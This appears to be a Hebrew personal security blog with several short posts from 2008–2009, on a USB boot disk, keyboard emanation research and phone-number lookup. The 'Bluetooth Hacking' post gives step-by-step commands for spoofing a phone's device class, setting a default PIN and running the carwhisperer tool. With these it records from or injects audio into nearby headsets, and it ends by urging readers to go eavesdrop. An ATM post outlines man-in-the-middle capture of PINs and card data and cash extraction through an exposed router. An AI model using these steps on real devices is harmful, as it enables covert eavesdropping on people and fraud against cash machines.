יום שישי, 6 בפברואר 2009
יום שישי, 16 בינואר 2009
כספומטים
היה קשה לא להבחין שהכספומט מחובר בעזרת ADSL לנקודה בקיר במבט מאחורי הכספומט
נתקלתי ב - ROUTER מסוג ECI שנמצא בתוך המכונה אך ניתן לגישה עקב הפתחים הגדולים שנמצאים בחלק האחורי של המכונה.
כמה קשה יהיה להתחבר לנקודה ב ROUTER לבצע פעולת MITM- man in the middle attack ולאחר מכן לבצע האזנה על כלל התעבורה העוברת ולתפוס מספרי קוד אישי ותוכן של הפס המגנטי.
או למשל להשתמש ב - Exploit עדכני על הכספומט ולקבל שליטה מוחלטת עליו ולהתחבר לרכיב הוצאת הכסף על ידי חקירת תוכנת המערכת ולהוציא כסף מהכספומט.
או לחילופין להתחבר לכספומטים אחרים שמחוברים לתשתית ה - ADSL שפרוסה ומחברת בין כל הכספומטים למרכז או אפילו חדירה למחשב המרכזי.
מכיוון שאני מהאנשים הטובים ולא הרעים שילכו וינצלו את זה התרעתי והודעתי לחברה על הבעיה ואני מעריך שהנושא יטופל בקרוב.
אבל השאלה הנשאלת היא איך מגיעים למצב כזה ? אני מעריך שיש הרבה חשיבה סביב הנושא בחברות הכספומטים איך פיספסו ? מה אמרו "שם זה לא יקרה" ? מפתיע אבל כנראה שהעולם עדיין לא שם והמודעות עדיין נמוכה בתחום הנ"ל.


תוויות: כספוטים, פריצה לכספומט, פריצה לכספומטים
יום שישי, 2 בינואר 2009
המלחמה ממשיכה גם ברשת
תוויות: YNET ניפרץ
יום שישי, 5 בדצמבר 2008
Bootable Disk On key
טוב ישנם לא מעט שיטות מורכבות יותר ומורכבות פחות לבצע תהליך שכזה אבל השיטה הבאה היא הפשוטה ביותר שאני מכיר.
אז מה עושים?
מורידים את התוכנה הבא:
להלן תמונת מסך של התוכנה:

לאחר מכן יש לסמן את
Create a dos startup disk
וזהו יש לכם Bootable Disk On key תהנו :)
יום חמישי, 4 בדצמבר 2008
PS2 חוקרים הצליחו להאזין מרחוק למקלדת
בעבר בסרטים הינו רואים אנשים יושבים ברכב מסחרי מרוחק ומאזינים למחשבים ברשת. אלו היו סרטים דמיוניים האם עכשיו זה הופך להיות מציאות ?!
כנראה שכן אני מעריך שהרבה ארגוני ביון עובדים עכשיו על אנטנות קטנות יותר המסוגלות לבצע משהו דומה ממרחק הגדול מ – 20 מטר.
עם זאת יש לקחת את הנושא בפרופורציה מכיוון שעל מנת לבצע תהליך שכזה יש להסיר הרבה רעשי רקע אשר יכולים להיגרם מפלאפונים,ספקי כוח, מסכים ועוד.
Compromising Electromagnetic Emanations of Keyboards Experiment 1/2 from Martin Vuagnoux on Vimeo.
Compromising Electromagnetic Emanations of Keyboards Experiment 2/2 from Martin Vuagnoux on Vimeo.
תוויות: אבטחת מידע במקלדות, האזנה, האזנה למקלדת, ציתות, keylogger
יום חמישי, 13 בנובמבר 2008
Bluetooth Hacking
תחשבו על הדבר הבא, לכמה ממכם יש אוזנית Bluetooth שנמצאת לידכם או לחילופין מחוברת לאוזן כל הזמן, כמו כן לכמה ממכם יש דיבורית Bluetooth באוטו ?
כאשר הגדרתם את האוזניה בפעם הראשונה נדרשתם להקיש קוד ברירת מחדל כגון:
0000
1234
1111
וכדומה נכון ?
לאחר הקשת הקוד התאפשר לכם להתחבר למכשיר הטלפון ולהשתמש באוזניה לפעילות יום יומית.
אז לאן אני חותר כפי שאתם יודעים קוד זה הוא ברירת מחדל ולא רק אנחנו יודעים עליו אלא גם האקרים שמחפשים סתם להשתעשע או לחילופין לבצע תקיפה ממוקדת.
ובעזרת קוד זה ניתן בדגמים מסוימים (שלא דורשים לחיצה על האוזניה) להתחבר ללא כל בעיה לאוזניה ולבצע תהליך של Pairing שבסופו ניתן להפוך את האוזניה למכשיר ציתות.
נשמע נחמד לא אז איך ניתן לבצע זאת
על מנת לבצע תהליך שכזה דרושים לנו המרכיבים הבאים
מחשב נייד
רכיב Bluetooth
מערכת הפעלה Linux
דרייברים של Bluetooth ו - bluez dev
לאחר שהתקנתם את הדרייברים ניתן לבחון האם ה – Bluetooth עובד בעזרת פקודת
Hcitool scan
פקודה זו תציג לכם את המכשירים אשר יש להם Bluetooth פעיל בקירבתכם.
השלב הבא הוא להפוך את המכשיר שלנו ממחשב למכשיר טלפון, על מנת שהאוזניה תאפשר לנו להתחבר אנו צריכים לגרום לה לחשוב שאנחנו טלפון ולא מחשב.
להלן רשימת הפקודות לביצוע:
Hciconfig hci0 class
פקודה זו מאפשרת לנו לראות כי אנחנו מוגדרים כמצב מחשב
Hciconfig hci0 0x50204
פקודה זו מחליפה את הגדרות ה – Bluetooth כך שיחשבו שהמחשב שלנו הוא מכשיר טלפון
Hciconfig hci0 class
הרצה נוספת של פקודה זו תציג לנו כי מצבנו השתנה וכי אנו מוגדרים כטלפון.
Nano /etc/blutooth/pin => 0000
פקודה זו תאפשר לנו להגדיר את PIN ברירת המחדל של האוזניה.
לאחר סיום ההגדרות יש להוריד את הכלי הבא:
http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
כלי זה מאפשר לנו להתחבר לאוזניה ולהקליט שמע ממנה (כמו מכשיר ציתות) או לחילופין להשמיע שמע לאוזניה.
הפקודה לביצוע הפעולה היא:
./ Carwhisperer hci0 voiceput.raw voiceget.raw bdaddr_of_target
על מנת לאתר את יעד התקיפה ניתן להשתמש בפקודת
Hcitool scan
ולבחור את יעד התקיפה.
זהו יאללה לכו תצותתו
תוויות: Bluetooth Hacking
יום שבת, 1 בנובמבר 2008
שיחה מזוהה
כמה פעמים רציתם לברר מי עומד מאחורי המספר שהתקשר אליכם בזה הרגע, ואותו אינכם מזהים.
בעבר היה אתר בשם 441 שאפשר להכניס את מספר הטלפון ולקבל את פרטי המתקשר.
אך עם הזמן האתר ירד.
עבדכם הנאמן איתר אתר חדש שמאפשר פעולה שכזו.
נ.ב רעיון קטן ל – STARTUP, אפליקציה שיושבת על הטלפון ובכל פעם שמזהה מספר לא מוכר ניגשת בעזרת ה – GPRS לאתר ומציגה את תוצאות החיפוש ישירות לטלפון.
ככה תמיד תדעו מי התקשר:)
להלן הלינק לאתר:
תוויות: 144, 441, איתור, איתור טלפון, שיחה מזוהה


